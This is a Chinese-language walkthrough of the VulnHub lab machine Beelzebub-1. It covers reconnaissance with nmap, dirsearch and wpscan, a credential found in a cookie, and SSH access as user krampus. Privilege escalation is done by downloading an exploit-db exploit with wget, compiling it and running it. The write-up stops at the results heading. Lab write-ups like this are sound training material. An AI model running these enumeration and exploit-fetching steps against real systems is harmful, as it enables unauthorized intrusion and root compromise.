『vulnhub系列』BEELZEBUB- 1
下载地址:
https://www.vulnhub.com/entry/beelzebub-1,742/
信息搜集:
使用nmap扫描存活主机,发现主机开启了22和80端口
nmap 192.168.0.*
访问80端口的web服务,发现是apache的默认页面
使用dirsearch扫描目录
dirsearch -u "http://192.168.0.140/"
发现存在phpmyadmin等页面,访问index.php页面,发现是404 /login也是一样
感觉有猫腻,查看一下源代码,果然发现一行提示
<!--My heart was encrypted, "beelzebub" somehow hacked and decoded it.-md5-->
#我的心被加密了,"beelzebub"不知如何被入侵了,并且被解密了 md5
大概的意思是本来是被加密的,后来被用md5解密了,现在我们使用md5加密一下
d18e1e22becbd915b45e0e655429d487
然后当作目录扫描一下
dirsearch -u "http://192.168.0.140/d18e1e22becbd915b45e0e655429d487"
然后我们发现是个Wordpress 网站,里面有登录页面(这里靶机换了ip变为192.168.0.128)
还有一个文件上传的目录页面
点开Talk To VALAK 发现是个带有输入框的页面
随便输入一个数据,查看cookie 多出来一个Password 值为M4k3Ad3a1
因为是Wordpress页面,因此可以使用工具wpscan
使用命令:
wpscan --url=http://192.168.0.128/d18e1e22becbd915b45e0e655429d487/ --ignore-main-redirect --force -e --plugins-detection aggressive
- --ignore-main-redirect 忽略重定向扫描目标
- --force 不检查是否运行wordpress
- -e --enumerate 枚举,默认枚举所有插件,备份
- --plugins-detection aggressive 使用提供的模式枚举插件 默认被动(passvie)可选:混合(mix)被动(passvie)主动(aggressive)
扫描到用户valak 和krampus 我们使用这两个用户名和密码M4k3Ad3a1进行登录
因为wordpress页面跳转有些问题,我们使用ssh登录,使用krampus登录成功
权限提升:
进入系统后,使用命令ls -la 发现有两个文件很可疑
但是.sudo_as_admin_successful 大小为0所以我们直接看.bash_history可以看到命令历史
然后我们发现有一个wget和gcc编译命令,我们照着运行
wget https://www.exploit-db.com/download/47009
mv 47009 ./exploit.c
gcc exploit.c -o 1
./1
成果:
